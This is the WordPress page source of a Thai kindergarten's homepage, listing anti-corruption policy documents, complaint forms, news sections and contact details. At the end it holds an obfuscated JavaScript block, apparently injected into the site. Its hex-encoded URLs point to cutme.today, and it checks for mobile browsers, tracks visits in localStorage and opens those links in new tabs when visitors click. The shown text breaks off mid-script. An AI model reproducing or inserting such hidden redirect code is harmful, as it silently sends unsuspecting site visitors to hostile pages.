data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const 